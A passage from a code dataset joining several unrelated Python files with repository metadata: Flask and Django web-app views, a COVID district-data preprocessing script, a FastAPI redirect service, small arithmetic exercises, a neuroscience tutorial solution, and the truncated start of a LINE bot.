sentences_to_html\nfrom app.PlottingTextData import plot_word_counts, plot_words_sent\nfrom app.forms.reader_form import ReaderForm\nfrom app.forms.keywords_form import AddKeywordsForm, RmvKeywordsForm, RmvSetForm\nfrom app.forms.comparer_form import CompareForm\n\n\n\n\n# Main routes file. Contains all sub-pages code and their imports:\n# 1. Index\n# 2. Keywords\n# 3. Reader\n# 4. Form [comparer page]\n# 5. (...) tbd.\n\n\n\n# 1. INDEX\n# --------\n\n@app.route('/')\n@app.route('/index')\ndef index():\n\treturn render_template('index.html', title='Home')\n\n\n# 2. KEYWORDS\n# -----------\n\n@app.route('/keywords', methods=['GET', 'POST'])\ndef keywords_main_page():\n\n\t# Clean, unify later\n\tcredentials = { 'dbname': 'reader_keywords', 'dbuser': 'luke'} # TEMP: into a file.\n\tkeywords_table_name = 'keywords_test'\n\tkeywords_columns_types = \t[\n\t\t\t\t\t\t\t\t\t#('id serial', 'PRIMARY KEY'),\n\t\t\t\t\t\t\t\t\t('set_name', 'text'),\n\t\t\t\t\t\t\t\t\t('keyword', 'text'),\n\t\t\t\t\t\t\t\t\t# ...\n\t\t\t\t\t\t\t\t]\n\tDBM = DataBaseManager(credentials, keywords_table_name, keywords_columns_types)\n\n\n\tadd_kwds_form = AddKeywordsForm()\n\tif add_kwds_form.validate_on_submit():\n\t\t\n\t\tkeywords = add_kwds_form.add_kwds.data\n\t\tset_name = add_kwds_form.add_kwds_set_name.data\n\t\t\n\t\tDBM.add_keywords(set_name, keywords)\n\n\t\tx = 'add'\n\t\tprint(x)\n\n\trmv_kwds_form = RmvKeywordsForm()\n\tif rmv_kwds_form.validate_on_submit():\n\t\t\n\t\tkeywords = rmv_kwds_form.rmv_keywords.data\n\t\tset_name = rmv_kwds_form.rmv_kwds_set_name.data\n\n\t\tDBM.rmv_keywords(set_name, keywords)\n\n\t\tx = 'rm kw'\n\t\tprint(x)\n\n\trmv_set_form = RmvSetForm()\n\tif rmv_set_form.validate_on_submit():\n\n\t\tset_name = rmv_set_form.rmv_set_name.data\n\n\t\tDBM.rmv_kwd_set(set_name)\n\n\t\tx = 'rm set'\n\t\tprint(x)\n\n\t# ADD DISPLAY CURRENT KWS\n\tDBM.get_names_of_sets()\n\n\treturn render_template('keywords.html', title='Keywords',add_kwds_form=add_kwds_form, rmv_kwds_form=rmv_kwds_form, rmv_set_form=rmv_set_form, )\n\n\n\n# 3. KEYWORDS\n# -----------\n\n@app.route('/reader', methods=['GET', 'POST'])\ndef reader_main_page():\n\n\t# Clean, unify later\n\tcredentials = { 'dbname': 'reader_keywords', 'dbuser': 'luke'} # TEMP: into a file.\n\tkeywords_table_name = 'keywords_test'\n\tkeywords_columns_types = \t[\n\t\t\t\t\t\t\t\t\t#('id serial', 'PRIMARY KEY'),\n\t\t\t\t\t\t\t\t\t('set_name', 'text'),\n\t\t\t\t\t\t\t\t\t('keyword', 'text'),\n\t\t\t\t\t\t\t\t\t# ...\n\t\t\t\t\t\t\t\t]\n\n\tDBM = DataBaseManager(credentials, keywords_table_name, keywords_columns_types)\n\tRF = ReaderForm()\n\t\n\tlink_validation = RF.link_field.validate(RF)\n\tselect_validation = RF.select.validate(RF)\n\n\tif select_validation and not link_validation:\n\t\tset_name = RF.select.data\n\t\tkeywords = DBM.get_set_keywords(set_name)\n\t\treturn render_template('reader.html', title='Reader', reader_form=RF, keywords=keywords)\n\n\tif link_validation and select_validation:\n\n\t\t\n\t\t##### Universal Base.\n\t\tset_name = RF.select.data\n\t\tkeywords = DBM.get_set_keywords(set_name)\n\t\tkeywords = [k.lower() for k in keywords]\n\t\tfull_text = get_input_text(RF.link_field.data)\n\n\t\t# Computation costs reduction - further fix.\n\t\tif RF.reader_mode_select.data == 'Keyword sentences + hints':\n\t\t\tREADER_MODE_FRAME_TYPE = 'Full'\t\t\n\t\t# elif RF.reader_mode_select.data == 'Keyword sentences':\n\t\t# \tREADER_MODE_FRAME_TYPE = 'Handy'\n\t\telse:\n\t\t\tREADER_MODE_FRAME_TYPE = 'Full'\n\n\t\t# General statistics:\n\t\t# --------------------------------------------------------\n\n\t\t# Word counts\n\t\tgeneral_word_counts = text_values_counts_dict(full_text)\n\n\t\t# Full text sentiment [useless?]\n\t\tfull_text_sentiment = text_sentiment(full_text) # int \n\t\t\n\n\t\t# TextFrame ( future: CompCost minimalization: df types (handy, spec, lightweight)\n\t\t# - Text to sentences frame\n\t\t# - Feature Engineering\n\t\t# ---------------------\n\n\t\t# Frame with a raw and cleaned sentences.\n\t\tTTF = TextToFrame(full_text, keywords)\n\t\tdf_sentences = TTF.prepare_sentence_dataframe()\n\n\t\t# Dataframe with defined features pick.\n\t\tTTE = TextFeatureEngineering(df_sentences, keywords)\n\t\tdf = TTE.run(READER_MODE_FRAME_TYPE)\n\n\t\t# Sentences with a keyword\n\t\tkeyword_sentences = get_sentences_with_keyword(df)\n\n\n\n\n\t\t# DataFrame to Results: Minimalization\n\t\t# ------------------------------------\n\n\t\t# Keywords display.\n\t\tkeywords_display = ', '.join([k for k in keywords if k != ''])\n\n\n\t\t# Features out\n\n\t\t# N nouns display.\n\t\tif RF.nouns_display.data == True:\n\t\t\tn_nouns = RF.nouns_amount.data\n\t\t\tnouns = select_n_most_occuring_phrases(df, 'nouns', general_word_counts, n_nouns)\n\t\telse:\n\t\t\tnouns = None\n\n\t\t# N entities display.\n\t\tif RF.ent_display.data == True:\n\t\t\tn_ent = RF.ent_amount.data\n\t\t\tents_org = select_n_most_occuring_phrases(df, 'ent_org', general_word_counts, n_ent)\n\n\t\t\t# ents org sentiment test:\n\t\t\tall_sentences = sent_tokenize(full_text) \n\t\t\tphrases_group = ents_org.split(', ')\n\t\t\tents_org_sent = phrases_sentiment_in_respect_to_full_text(all_sentences, phrases_group)\n\t\t\tfor k, v in ents_org_sent.items():\n\t\t\t\tprint(k, v)\n\n\t\t\tents_p = select_n_most_occuring_phrases(df, 'ent_person', general_word_counts, n_ent)\n\t\t\tents_gpe = select_n_most_occuring_phrases(df, 'ent_gpe', general_word_counts, n_ent)\n\t\t\tents_norp = select_n_most_occuring_phrases(df, 'ent_norp', general_word_counts, n_ent)\n\t\telse:\n\t\t\tents_org, ents_p, ents_gpe, ents_norp = None, None, None, None\n\t\t\n\n\t\tif RF.summary_display.data == True:\n\t\t\tsummary_part = True\n\t\telse:\n\t\t\tsummary_part = None\n\t\t\n\n\n\n\n\t\tif RF.graphs_display.data == True:\n\t\t\tfig1 =plot_word_counts(general_word_counts, 10)\n\t\t\tfig3 =plot_words_sent(ents_org_sent)\n\t\t\tgraph_test = '/static/images/word_counts_graph_xx.png' # Recode\n\t\t\tgraph_test3 = '/static/images/word_counts_graph_xx3.png' # Recode\n\t\t\tgraphs = [graph_test, graph_test3]\n\t\telse:\n\t\t\tgraphs = None\n\n\n\n\t\t# Render template display\n\t\tfeatured_sentences = []\n\t\tfor i in range(len(df)):\n\t\t idx = i\n\t\t is_sent = df.loc[i, 'keywords']\n\t\t words = str(df.loc[i, 'named_ents_nouns'])\n\t\t sent = str(df.loc[i, 'sentence'])\n\t\t featured_sentence = [idx, is_sent, words, sent]\n\t\t featured_sentences.append(featured_sentence)\n\n\n\n\t\t#reader_frame_type_validation = RF.reader_frame_select.data\n\t\treader_frame = RF.reader_mode_select.data\n\t\tif RF.reader_mode_select.data == 'Keyword sentences + hints':\n\t\t\tsentences_html = sentences_to_spanned_html(featured_sentences)\n\t\telif RF.reader_mode_select.data == 'Keyword sentences':\n\t\t\tsentences_html = sentences_to_html(featured_sentences)\n\n\n\n\n\n\t\treturn render_template('reader.html', title='Reader', spanned_test=sentences_html, reader_form=RF, summary_part=summary_part, graphs=graphs, keywords=keywords_display, ks=keyword_sentences, eo=ents_org, nn=nouns, ep=ents_p, eg=ents_gpe, en=ents_norp)\n\n\t# Display link contents [from above]. Graphs\n\t# Modify contnet according to a settings.\n\n\treturn render_template('reader.html', title='Reader', reader_form=RF)\n\n\n\n\n# 4. COMPARER.\n# ------------\n\n@app.route('/form', methods=['GET', 'POST'])\ndef input_data():\n\n\tclass DataFromURL():\t\n\t\tdef get_raw_page_contents(self, link):\n\t\t\thtml = urllib.request.urlopen(link).read()\n\t\t\tsoup = BeautifulSoup(html, \"lxml\")\n\t\t\treturn soup\n\t\tdef run(self, link):\n\t\t\tout = self.get_raw_page_contents(link)\n\t\t\treturn out\n\n\tscraper = DataFromURL()\n\tform = CompareForm()\n\n\tif form.validate_on_submit():\n\n\t\t\n\t\tlink_1 = form.input_link1.data\n\t\tlink_2 = form.input_link2.data\n\t\t\n\t\t# GET DATA\n\n\t\tlink_1_contents = scraper.run(link_1)\n\t\tlink_2_contents = scraper.run(link_2)\n\n\t\t# PREPARE\n\n\t\t# UPLOAD TO DB - OPTIONAL FOR NOW\n\n\t\t# THROUGH A MODEL\n\n\t\t# GET OUTPUT\n\n\t\t# VISUALISE\n\n\t\t# SHOW RESULTS\n\n\t\tdata_out = {\n\t\t'link1' : link_1,\n\t\t'link2' : link_2,\n\t\t'link1_contents' : link_1_contents,\n\t\t'link2_contents' : link_2_contents,\n\t\t}\n\t\treturn render_template('result.html', title='Result', data_out=data_out) # hmm.\n\n\telse:\n\t\tflash('Link 1 and Link 2 are required')\n\t\treturn render_template('form.html', title='Compare', form=form)","repo_name":"Hiurge/reader-parts","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":9057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70105796586","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\nimport requests\n\n\n\ncode = 'MH' #State name\ndata = requests.get('https://api.covid19india.org/v4/min/timeseries-{}.min.json'.format(code)) #API\ndata = data.json()\n\ndef transform_func(x, ATTR_type, i):\n if pd.isnull(x):\n return 0\n else:\n val = x[ATTR_type][i]\n return val\n \n\n#Create single scalar dataframe for selected datatype\ndef create_TxN_df(dict_data, ATTR_type, ATTR_val):\n df = pd.DataFrame.from_dict(ALL_DISTRICT_DATA)\n \n if ATTR_val == 'confirmed':\n i = 0\n \n elif ATTR_val == 'deceased':\n i = 1\n \n elif ATTR_val == 'recovered':\n i = 2\n \n for col in df.columns:\n df[col] = df[col].apply(lambda x: transform_func(x, ATTR_type, i))\n \n return df\n\n\ndef get_data_by_district(district_name, SKIP_START=0, SKIP_END=0, TOTAL_LEN=444):\n #district_name = 'Akola'\n data_per_day = data[code]['districts'][district_name]['dates'] \n # node feature vector data for each day\n\n ATTR_LIST = ['confirmed', 'deceased', 'recovered', 'vaccinated1', 'vaccinated2']\n ALL_KEYS = ['delta', 'delta7', 'total']\n\n DISTRICT_INFO_DICT = {}\n\n ctr = 0\n for date in data_per_day:\n ctr+=1\n if ctr<=SKIP_START:\n continue\n if ctr >= TOTAL_LEN - SKIP_END:\n continue\n \n day_data = data_per_day[date]\n\n daily_info_dict = {}\n\n for key in ALL_KEYS:\n daily_info_dict[key] = []\n for attr in ATTR_LIST:\n daily_info_dict[key].append(day_data.get(key, {}).get(attr, 0))\n\n DISTRICT_INFO_DICT[date] = daily_info_dict\n \n return DISTRICT_INFO_DICT, min(DISTRICT_INFO_DICT.keys()), max(DISTRICT_INFO_DICT.keys())\n\n\ndef get_all_data(ATTR_type, ATTR_val):\n#GET dataframe of cases for all cities\n init_skip_val = 15\n end_skip_val = 1\n\n DISTRICT_NAMES = ['ahmednagar', 'akola', 'amravati', 'aurangabad', 'beed',\n 'bhandara', 'buldhana', 'chandrapur', 'dhule', 'gadchiroli',\n 'gondia', 'hingoli', 'jalgaon', 'jalna', 'kolhapur', 'latur',\n 'mumbai', 'nagpur', 'nanded', 'nandurbar', 'nashik', 'osmanabad',\n 'palghar', 'parbhani', 'pune', 'ratnagiri', 'sangli', 'satara',\n 'sindhudurg', 'solapur', 'thane', 'wardha', 'washim', 'yavatmal']\n\n SKIP_DISTRICTS = ['Gadchiroli', 'Wardha']\n\n ALL_DISTRICT_DATA = dict()\n\n ctr = 0\n for NAME in DISTRICT_NAMES:\n NAME = NAME.title().strip()\n if NAME in SKIP_DISTRICTS:\n print(\"Skipping: \", NAME)\n continue\n\n ALL_DISTRICT_DATA[NAME], min_val, max_val = get_data_by_district(NAME, SKIP_START=init_skip_val, SKIP_END=end_skip_val)\n\n print(NAME, \": \", len(ALL_DISTRICT_DATA[NAME].keys()), \" | \", min_val, max_val)\n print('---'*4)\n\n print(\"--------------------------------\")\n print(\"All Districts: \", len(ALL_DISTRICT_DATA.keys()))\n \n vector_df = create_TxN_df(ALL_DISTRICT_DATA, ATTR_type, ATTR_val)\n pd.DataFrame(vector_df.values).to_csv('data/train/road_traffic/covid/vel.csv', header =False, index = False) #Save file\n\n #create Adjacency matrix\n df_adj = pd.read_csv('adjacency_matrix.csv')\n df_adj = df_adj[~df_adj['city1'].isin([x.lower() for x in SKIP_DISTRICTS])]\n df_adj = df_adj[~df_adj['city2'].isin([x.lower() for x in SKIP_DISTRICTS])]\n df_adj['distance'] = df_adj['distance']/ max(df_adj['distance'])\n adj_finl_data = df_adj.pivot_table('distance', ['city1'], 'city2')\n\n print(os.getcwd())\n\n pd.DataFrame(adj_finl_data.values).to_csv('data/train/road_traffic/covid/adj_mat.csv', header = False, index = False) #Save file","repo_name":"ayushchopra96/covid-gnn-1mg","sub_path":"create_datasets.py","file_name":"create_datasets.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18578133590","text":"#program to print sum of numbers in a list\r\ndef sum(numbers):\r\n total = 0\r\n for x in numbers:\r\n total += x\r\n return total\r\nprint(\"The sum is:\")\r\nprint(sum((2, 4, 6, 8, 10,12)))\r\n\r\n#program to find max b/w three numbers\r\ndef max2( x, y ):\r\n if x > y:\r\n return x\r\n return y\r\ndef max3( x, y, z ):\r\n return max2( x, max2( y, z ) )\r\nprint(\"The max number is:\")\r\nprint(max3(20, 7, -5))\r\n\r\n\r\n","repo_name":"harsh22chauhan/Python-Projects","sub_path":"basic codes/funlist.py","file_name":"funlist.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38519275657","text":"from fastapi import FastAPI, HTTPException\nfrom fastapi.responses import RedirectResponse\nfrom pydantic import BaseModel\n\napp = FastAPI()\n\nclass SlugModel(BaseModel):\n slug: str\n\n@app.get(\"/{slug}\")\nasync def redirect_to_substack(slug: str):\n if not slug:\n raise HTTPException(status_code=400, detail=\"Empty slug not allowed\")\n substack_url = f\"https://substack.com/{slug}\"\n return RedirectResponse(url=substack_url)","repo_name":"djquesadilla/shubstack","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14128889635","text":"############\n## Solution\n############\n# sample n_frozen_trials state sequences\nXf = np.zeros(T, dtype=int)\nXf[0] = (psi.cumsum() > np.random.rand()).argmax()\nfor t in range(1, T):\n Xf[t] = (A[Xf[t - 1],:].cumsum() > np.random.rand()).argmax()\n\n# switch to one-hot encoding of the state\nXf = np.eye(K, dtype=int)[Xf] # (T,K)\n\n# get the Y values\nRates = np.squeeze(L @ Xf[...,None]) * dt # (T,C)\nRates = np.tile(Rates, [n_frozen_trials,1,1]) # (n_trials, T, C)\nYf = ss.poisson(Rates).rvs() ","repo_name":"ddinesan/Neuroscience","sub_path":"tutorials/W2D3_DecisionMaking/solutions/W2D3_Tutorial2_Solution_83cea173.py","file_name":"W2D3_Tutorial2_Solution_83cea173.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39772363664","text":"# marketaccess/views.py\n\nimport json\nimport requests\nfrom mptt.templatetags.mptt_tags import cache_tree_children\n\nfrom django.core.paginator import Paginator\nfrom django.conf import settings\nfrom django.db.models import Q\nfrom django.shortcuts import HttpResponse\nfrom django.urls import reverse_lazy\nfrom django.views.generic import (\n View, TemplateView, FormView, ListView, DetailView\n)\n\nfrom api_client import api_client\nfrom .helpers import (\n store_companies_house_profile_in_session_and_validate,\n has_company\n)\nfrom .models import (\n BarrierNotification, BarrierRecord, BarrierSource,\n BarrierReport, BarrierCountry, BarrierType\n)\nfrom .forms import BarrierCountryForm, ReportBarrierForm\n\nfrom sso.utils import SSOSignUpRequiredMixin\n\nclass HomeView(TemplateView):\n template_name = 'home.html'\n\n def get_context_data(self, **kwargs):\n context = super(HomeView, self).get_context_data(**kwargs)\n user = self.request.sso_user\n context['user'] = user\n context['user_has_company'] = (\n user and has_company(user.session_id)\n )\n context['num_barriers'] = BarrierRecord.objects.count\n return context\n\nclass GovUKView(TemplateView):\n template_name = 'govuk.html'\n pass\n\nclass GovUKDITView(TemplateView):\n template_name = 'govuk-dit.html'\n pass\n\nclass PrototypesView(TemplateView):\n template_name = 'prototypes.html'\n pass\n\nclass ReportBarrierView(FormView):\n template_name = 'report-barrier.html'\n form_class = BarrierCountryForm\n\n countries = ''\n\n def get(self, request, *args, **kwargs):\n # we're reporting a new barrier, so clear\n # any existing barriers from the session\n if 'existingbarrier' in request.session:\n del request.session['existingbarrier']\n if 'existingnotification' in request.session:\n del request.session['existingnotification']\n return super(ReportBarrierView, self).get(request, *args, **kwargs)\n\n def get_success_url(self, **kwargs):\n return reverse_lazy(\n 'home'\n )\n\n def form_valid(self, form):\n self.countries = form.cleaned_data['countries_affected']\n return super(ReportBarrierView, self).form_valid(form)\n\n\nclass ReportExistingBarrierView(FormView):\n template_name = 'report-barrier-existing.html'\n form_class = BarrierCountryForm\n\n countries = ''\n\n def get(self, request, *args, **kwargs):\n self.barrier = BarrierRecord.objects.get(pk = kwargs['pk'])\n request.session['existingbarrier'] = self.barrier.pk\n if 'existingnotification' in request.session:\n del request.session['existingnotification']\n return super(ReportExistingBarrierView, self).get(request, *args, **kwargs)\n\n def get_success_url(self, **kwargs):\n return reverse_lazy(\n 'home'\n )\n\n def form_valid(self, form):\n self.countries = form.cleaned_data['countries_affected']\n return super(ReportExistingBarrierView, self).form_valid(form)\n\n def get_context_data(self, *args, **kwargs):\n context = super(ReportExistingBarrierView, self).get_context_data(*args, **kwargs)\n context['barrier'] = self.barrier\n return context\n\n\nclass ReportExistingNotificationView(FormView):\n template_name = 'report-barrier-existing.html'\n form_class = BarrierCountryForm\n\n countries = ''\n\n def get(self, request, *args, **kwargs):\n self.notification = BarrierNotification.objects.get(pk = kwargs['pk'])\n request.session['existingnotification'] = self.notification.pk\n if 'existingbarrier' in request.session:\n del request.session['existingbarrier']\n return super(ReportExistingNotificationView, self).get(request, *args, **kwargs)\n\n def get_success_url(self, **kwargs):\n return reverse_lazy(\n 'home'\n )\n\n def form_valid(self, form):\n self.countries = form.cleaned_data['countries_affected']\n return super(ReportExistingNotificationView, self).form_valid(form)\n\n def get_context_data(self, *args, **kwargs):\n context = super(ReportExistingNotificationView, self).get_context_data(*args, **kwargs)\n context['barrier'] = self.notification\n return context\n\n\nclass SearchView(FormView):\n template_name = 'search.html'\n form_class = ReportBarrierForm\n\n countries = ''\n\n def get_success_url(self, **kwargs):\n return reverse_lazy(\n 'home'\n )\n\n def form_valid(self, form):\n self.countries = form.cleaned_data['countries_affected']\n return super(SearchView, self).form_valid(form)\n\n\nclass SearchResultsView(ListView):\n template_name = 'search-results.html'\n country_text = ''\n country_object = None\n model = BarrierRecord\n context_object_name = 'uk_barriers'\n paginate_by = 10 # page size for default queryset ie UK barrier reports\n EC_NOTIFICATIONS_PAGE_SIZE = 5\n WTO_NOTIFICATIONS_PAGE_SIZE = 5\n\n def __init__(self, *args, **kwargs):\n self.uk_source = BarrierSource.objects.get(short_name='UK')\n #self.wto_source = BarrierSource.objects.get(short_name='WTO')\n self.ec_source = BarrierSource.objects.get(short_name='EC MADB')\n return super(SearchResultsView, self).__init__(*args, **kwargs)\n\n def dispatch(self, request, *args, **kwargs):\n self.countries_search_text = request.GET.getlist('countries')\n self.product_search_text = request.GET.get('s', None)\n self.sector_search_text = request.GET.get('sectors', None)\n self.commoditycode_search_text = request.GET.get('commoditycodes', None)\n self.uk_barriers_page_number = kwargs.get('page', 1)\n return super(SearchResultsView, self).dispatch(request, *args, **kwargs)\n\n def get_queryset(self, *args, **kwargs):\n self.uk_barriers = BarrierRecord.objects.order_by('pk') # BarrierRecord doesn't need to be filtered\n self.ec_notifications = BarrierNotification.objects.filter(barrier_source=self.ec_source).order_by('pk')\n if self.countries_search_text:\n countries = []\n try:\n for country in self.countries_search_text:\n country_object = BarrierCountry.objects.get(name__iexact=country)\n countries.append(country_object)\n except BarrierCountry.DoesNotExist:\n self.uk_barriers = []\n self.ec_notifications = []\n else:\n self.uk_barriers = self.uk_barriers.filter(country__in=countries)\n self.ec_notifications = self.ec_notifications.filter(country__in=countries)\n if self.product_search_text:\n self.uk_barriers = self.uk_barriers.filter(\n Q(title__icontains=self.product_search_text)\n | Q(description__icontains=self.product_search_text)\n )\n self.ec_notifications = self.ec_notifications.filter(\n Q(title__icontains=self.product_search_text)\n | Q(description__icontains=self.product_search_text)\n | Q(products_text__icontains=self.product_search_text)\n )\n return self.uk_barriers\n\n def get_context_data(self, **kwargs):\n context_data = super(SearchResultsView, self).get_context_data(**kwargs)\n context_data['countries'] = self.countries_search_text\n context_data['products'] = self.product_search_text\n context_data['sector'] = self.sector_search_text\n # uk_barriers will be created by default\n context_data['ec_notifications'] = Paginator(self.ec_notifications, self.EC_NOTIFICATIONS_PAGE_SIZE).page(1)\n #context_data['wto_barriers'] = Paginator(self.wto_barriers, self.WTO_NOTIFICATIONS_PAGE_SIZE).page(1)\n return context_data\n\n\nclass BarrierDetailView(DetailView):\n model = BarrierRecord\n template_name = 'barrier-detail.html'\n\n\nclass SessionContextMixin(object):\n def post(self, *args, **kwargs):\n return self.get(*args, **kwargs)\n\n def get_context_data(self, *args, **kwargs):\n context = super(SessionContextMixin, self).get_context_data(*args, **kwargs)\n if 'existingbarrier' in self.request.session:\n existing_barrier_id = self.request.session['existingbarrier']\n context['existingbarrier'] = BarrierRecord.objects.get(pk=existing_barrier_id)\n if 'existingnotification' in self.request.session:\n existing_notification_id = self.request.session['existingnotification']\n context['existingnotification'] = BarrierNotification.objects.get(pk=existing_notification_id)\n if 'is_trade_association' in self.request.session:\n context['is_trade_association'] = self.request.session['is_trade_association']\n if 'logged_in' in self.request.session:\n context['logged_in'] = self.request.session['logged_in']\n return context\n\n\nclass NotificationDetailView(DetailView):\n model = BarrierNotification\n template_name = 'notification-detail.html'\n\nclass BarrierTypeDetailView(SessionContextMixin, DetailView):\n model = BarrierType\n template_name = 'barrier-type-detail.html'\n\nclass BarrierSubscribeView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'barrier-subscribe.html'\n\nclass BarriersGeneralInfoView(SessionContextMixin, ListView):\n model = BarrierType\n template_name = 'barriers-general-info.html'\n\n def get_queryset(self):\n uk_source = BarrierSource.objects.get(short_name='UK')\n return BarrierType.objects.filter(barrier_source=uk_source)\n\nclass BarriersCaseStudyView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'barriers-case-study1.html'\n\nclass BarriersCaseStudy2View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'barriers-case-study2.html'\n\nclass BarriersCaseStudy3View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'barriers-case-study3.html'\n\nclass ReportBarrierTaskListView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-task-list.html'\n\nclass ReportBarrierStep1View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-step1.html'\n\nclass ReportBarrierStep2View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-step2.html'\n\n def post(self, request, *args, **kwargs):\n if 'dit[step1][type]' in self.request.POST:\n if request.POST['dit[step1][type]'] == 'I work for a trade association':\n request.session['is_trade_association'] = True\n elif 'is_trade_association' in request.session:\n # Allow it to be turned off again\n del request.session['is_trade_association']\n return self.get(request, *args, **kwargs)\n\n\nclass ReportBarrierStep3View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-step3.html'\n\nclass ReportBarrierStep4View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-step4.html'\n # https://django-mptt.github.io/django-mptt/tutorial.html#template\n\n def get_context_data(self, *args, **kwargs):\n context = super(ReportBarrierStep4View, self).get_context_data(*args, **kwargs)\n # warning - this will need to change if we change\n # the code of the UK barrier source\n uk_source = BarrierSource.objects.get(short_name='UK')\n uk_barrier_types = BarrierType.objects.filter(barrier_source=uk_source)\n context['barrier_types'] = uk_barrier_types\n return context\n\nclass ReportBarrierStep5View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-step5.html'\n\nclass ReportBarrierStep6View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-step6.html'\n\nclass ReportBarrierStep7View(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-step7.html'\n\nclass ReportBarrierRegisterView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-register.html'\n\nclass ReportBarrierLoginView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-login.html'\n\nclass ReportBarrierLogoutView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-logout.html'\n\n def dispatch(self, request, *args, **kwargs):\n if 'logged_in' in request.session:\n request.session['logged_in'] = False\n return super(ReportBarrierLogoutView, self).dispatch(request, *args, **kwargs)\n\nclass ReportBarrierSaveView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-save.html'\n\n def dispatch(self, request, *args, **kwargs):\n if 'logged_in' in request.GET:\n request.session['logged_in'] = True\n return super(ReportBarrierSaveView, self).dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(ReportBarrierSaveView, self).get_context_data(**kwargs)\n context['logged_in'] = 'false'\n context['completed_1'] = 'false'\n context['completed_2'] = 'false'\n context['completed_3'] = 'false'\n context['completed_4'] = 'false'\n context['completed_5'] = 'false'\n context['completed_6'] = 'false'\n\n if context['step'] == '1':\n context['completed_1'] = 'true'\n elif context['step'] == '2':\n context['completed_1'] = 'true'\n context['completed_2'] = 'true'\n elif context['step'] == '3':\n context['completed_1'] = 'true'\n context['completed_2'] = 'true'\n context['completed_3'] = 'true'\n elif context['step'] == '4':\n context['completed_1'] = 'true'\n context['completed_2'] = 'true'\n context['completed_3'] = 'true'\n context['completed_4'] = 'true'\n elif context['step'] == '5':\n context['completed_1'] = 'true'\n context['completed_2'] = 'true'\n context['completed_3'] = 'true'\n context['completed_4'] = 'true'\n context['completed_5'] = 'true'\n elif context['step'] == '6':\n context['completed_1'] = 'true'\n context['completed_2'] = 'true'\n context['completed_3'] = 'true'\n context['completed_4'] = 'true'\n context['completed_5'] = 'true'\n context['completed_6'] = 'true'\n\n return context\n\nclass ReportBarrierSuccessView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'report-barrier-success.html'\n\nclass RequestFastTrackView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'request-fast-track.html'\n\nclass FastTrackPhoneTextView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'fast-track-phone-text.html'\n\nclass ExampleSummaryView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'example-summary.html'\n\nclass ThanksView(SessionContextMixin, TemplateView):\n model = BarrierRecord\n template_name = 'thanks.html'\n\n\nclass CompaniesHouseRequestView(View):\n search_company = ''\n\n def get(self, request, *args, **kwargs):\n self.search_company = request.GET.get('company', '')\n api_response = requests.get(\n 'https://api.companieshouse.gov.uk/search/companies'\n '?q={}&items_per_page={}'\n .format(self.search_company, settings.COMPANIES_HOUSE_ITEMS_PER_PAGE),\n auth=(settings.COMPANIES_HOUSE_API_KEY, '')\n )\n kwargs['content_type'] = 'application/json'\n return HttpResponse(api_response.text, **kwargs)\n\n\nclass BarrierSubtypesLookupView(View):\n def get(self, request, *args, **kwargs):\n self.barrier_type = request.GET.get('barrier_type', '')\n api_response = ''\n if self.barrier_type:\n tree_node = BarrierType.objects.get(pk=self.barrier_type)\n tree_children_dict= tree_node.children_as_dict()\n kwargs['content_type'] = 'application/json'\n api_response = json.dumps(tree_children_dict)\n return HttpResponse(api_response, **kwargs)\n","repo_name":"uktrade/market-access-prototype","sub_path":"barriers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43483194616","text":"import sqlite3\n\nconnection = sqlite3.connect('email_schedule.db')\n\n\nwith open('sql/schema.sql') as f:\n connection.executescript(f.read())\n\ncur = connection.cursor()\n\ncur.execute(\"INSERT INTO email_recipient (id, email_address) VALUES (?, ?)\",\n (1, 'bagas.dewangkara@gmail.com')\n )\nconnection.commit()\nconnection.close()","repo_name":"Bagasdew/email_scheduler","sub_path":"init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12593152586","text":"from flask import Flask, request, abort\nimport os\n\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\nfrom linebot.models import (\n MessageEvent, TextMessage, TextSendMessage,\n)\n\napp = Flask(__name__)\nflag = True\nactivate_ = 